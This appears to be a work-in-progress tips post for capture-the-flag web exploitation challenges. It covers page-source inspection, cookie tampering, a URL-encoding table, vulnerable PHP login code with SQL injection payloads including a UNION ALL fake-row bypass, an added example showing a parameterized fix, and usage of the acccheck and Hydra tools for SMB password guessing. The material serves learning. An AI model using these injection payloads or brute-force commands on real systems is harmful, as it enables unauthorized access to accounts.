This post (work in progress) lists tips and tricks for Web Exploitation challenges in various CTFs.
You may want to use your browser to view the source of the web page (right click > View Source, or Ctrl + U). Sometimes important information is hidden in comments.
If there are files or directories like http://example.org/files/pixel.png, then http://example.org/files/ might be a directory listing containing some information. It is also always good to check the robots.txt file.
Cookies play an important part in remembering state. For example: loggedin=0 means you are not logged in, and just changing that to loggedin=1 gives you access.
It may be helpful to learn how to 'Inspect Element' in your browser. It helps you distinguish each element, whether hidden or not.
Some symbols need to be URL Encoded when included in GET requests.
Reserved characters after percent-encoding:
    !  %21
    #  %23
    $  %24
    &  %26
    '  %27
    (  %28
    )  %29
    *  %2A
    +  %2B
    ,  %2C
    /  %2F
    :  %3A
    ;  %3B
    =  %3D
    ?  %3F
    @  %40
    [  %5B
    ]  %5D
Common characters after percent-encoding (ASCII or UTF-8 based):
    newline  %0A or %0D or %0D%0A
    space    %20
    "        %22
    %        %25
    -        %2D
    .        %2E
    <        %3C
    >        %3E
    \        %5C
    ^        %5E
    _        %5F
    `        %60
    {        %7B
    |        %7C
    }        %7D
    ~        %7E
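To see why the table matters, here is an added example (not from the original post) that encodes a constructed value with Python's urllib and parses it back the way a server would: left raw, everything after '#' becomes the fragment and never reaches the server, and a raw '+' decodes to a space.

```python
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample containing several reserved characters from the table
# above: '@', ':', '#', '+' and '&'.
SAMPLE_VALUE = "p@ss:w0rd#1+2&x"
BASE = "http://example.org/check?v="   # hypothetical endpoint


def encode_param(value: str) -> str:
    """Percent-encode one query-string value. safe='' makes quote() encode
    every reserved character, including '/', which it keeps by default."""
    return quote(value, safe="")


def server_side_value(url: str, name: str) -> Optional[str]:
    """Parse a URL the way a typical server stack does and return the first
    value seen for parameter `name`, or None if it was lost on the way."""
    query = urlsplit(url).query   # the part after '#' is the fragment: never sent
    params = parse_qs(query, keep_blank_values=True)
    return params.get(name, [None])[0]


def raw_url(value: str) -> str:
    return BASE + value


def encoded_url(value: str) -> str:
    return BASE + encode_param(value)
```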
In some web exploitation challenges, if the secret is stored on the client side and some JavaScript is involved, you can possibly find the answer in the JavaScript console of the browser developer tools (F12 key).
Websites keep track of you (whether you are logged in or not) by keeping a cookie for you. Check whether the value of the cookie (if it is easy to guess, and most probably assigned linearly) can be changed to that of another user who might already be logged in.
If the login prompt contains a SQL query and the check only accepts exactly one result (if (mysqli_num_rows($result) !== 1)), then use limit 1, such as admin' or 1=1 limit 1;#
    // $con (the mysqli connection) and $FLAG are defined elsewhere in the challenge.
    $username = $_POST["username"];
    $password = $_POST["password"];
    // Vulnerable: user input is concatenated straight into the query.
    $query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
    $result = mysqli_query($con, $query);
    if (mysqli_num_rows($result) !== 1) {
        echo "<h1>Login failed.</h1>";
    } else {
        echo "<h1>Logged in!</h1>";
        echo "<p>Your flag is: $FLAG</p>";
    }
If the login prompt contains a SQL query, checks for exactly one result, and has extra checks (see the example below), then we can create a fake row in SQL whose values we control.
    $con = mysqli_connect("localhost", "sql2", "sql2", "sql2");
    // $FLAG is defined elsewhere in the challenge.
    $username = $_POST["username"];
    $password = $_POST["password"];
    // Vulnerable: the username is concatenated straight into the query.
    $query = "SELECT * FROM users WHERE username='$username'";
    $result = mysqli_query($con, $query);
    $logged_in = false;
    if (mysqli_num_rows($result) === 1) {
        $row = mysqli_fetch_array($result);
        // The password is compared against whatever row the query returned.
        if ($row["password"] === $password) {
            $logged_in = true;
            echo "<h1>Logged in!</h1>";
            echo "<pre>User level: ", $row["user_level"], "</pre>";
            if ($row["user_level"] >= 1337) {
                echo "<p>Your flag is: $FLAG</p>";
            } else {
                echo "<p>Only user levels 1337 or above can see the flag.</p>";
            }
        }
    }
You have to create a fake query such as
    random'AND 1=0 UNION ALL SELECT 'admin' AS username, 'hax' AS password, 2000 AS user_level --
Here the ' closes the username string, and 1=0 will always be false, invalidating the first half. The UNION ALL statement lets us concatenate two SQL SELECT queries, so we append UNION ALL and then our fake SELECT statement. Don't forget to enter the same password in the password field :P
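The following is an added example, not code from the original post: it rebuilds the second login check above against a constructed in-memory SQLite table and shows, side by side, why the fake row passes the one-row and password checks and why a bound parameter (the fix for both login snippets) makes the same input return no rows at all.

```python
import sqlite3

# Constructed stand-in for the challenge's users table: three columns, the
# same count the UNION ALL payload has to match.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.row_factory = sqlite3.Row
    con.execute("CREATE TABLE users (username TEXT, password TEXT, user_level INTEGER)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret', 1)")
    return con


def login_vulnerable(con, username, password):
    """Mirrors the challenge: string-built query, exactly-one-row check, then a
    password comparison against whatever row came back. Returns (ok, level)."""
    query = f"SELECT * FROM users WHERE username='{username}'"
    rows = con.execute(query).fetchall()
    if len(rows) != 1:
        return False, None
    row = rows[0]
    if row["password"] != password:
        return False, None
    return True, row["user_level"]


def login_fixed(con, username, password):
    """Hardened form: the username is bound as a parameter, so it is data and
    can never change the shape of the query."""
    rows = con.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()
    if len(rows) != 1:
        return False, None
    row = rows[0]
    # The challenge stores plaintext; real code would store a hash and use a
    # constant-time comparison (e.g. password_verify in PHP).
    if row["password"] != password:
        return False, None
    return True, row["user_level"]


# The payload from the post: the first SELECT matches nothing, the second
# supplies a row whose password and user_level the attacker chose.
PAYLOAD = ("random'AND 1=0 UNION ALL SELECT 'admin' AS username, "
           "'hax' AS password, 2000 AS user_level -- ")
```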
- Perl script running on a webpage: read Security Issues in Perl Scripts.
- In some web exploitation exercises, you can modify the GET/POST request in Burp Suite to get the flag.
passthru — Execute an external program and display raw output
The passthru() function is similar to the exec() function in that it executes a command. This function should be used in place of exec() or system() when the output from the Unix command is binary data which needs to be passed directly back to the browser.
Warning: When allowing user-supplied data to be passed to this function, use escapeshellarg() or escapeshellcmd() to ensure that users cannot trick the system into executing arbitrary commands.
Unlike smbmap and crackmapexec, acccheck can only be used for validating the credentials gathered.
    acccheck v0.2.1 - By Faiz
    Description:
    Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been chosen, and tries a combination of usernames and passwords in the hope to identify the password to a given account via a dictionary password guessing attack.
    Usage = ./acccheck [optional] -t [single host IP address] OR -T [file containing target ip address(es)]
    Optional:
    -p [single password]
    -P [file containing passwords]
    -u [single user]
    -U [file containing usernames]
    -v [verbose mode]
    acccheck -t 10.7.3.17 -u backup4idc -p bckp@123
    SUCCESS.... connected to 192.168.4.32 with username:'Administrat0r' and password:'P@ssw0rd!'
End of Scan
Here, we can also give a list of hosts in a text file by specifying the '-T' flag.
Hydra is a powerful command-line tool which can be used for brute-forcing several services such as SMB, HTTP, RSH, SSH etc. It can also be used for validating credentials.
    Hydra v8.5 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server[:PORT][/OPT]]
    Options:
    -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
    -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
    -C FILE   colon separated "login:pass" format, instead of -L/-P options
    -M FILE   list of servers to attack, one entry per line, ':' to specify port
    -t TASKS  run TASKS number of connects in parallel per target (default: 16)
    -U        service module usage details
    -h        more command line options (COMPLETE HELP)
    server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
    service   the service to crack (see below for supported protocols)
    OPT       some service modules support additional input (-U for module help)
With -M the target list replaces the server argument, so only the service name follows it:
    hydra -l Administrat0r -p P@ssw0rd! -M hosts1.txt smb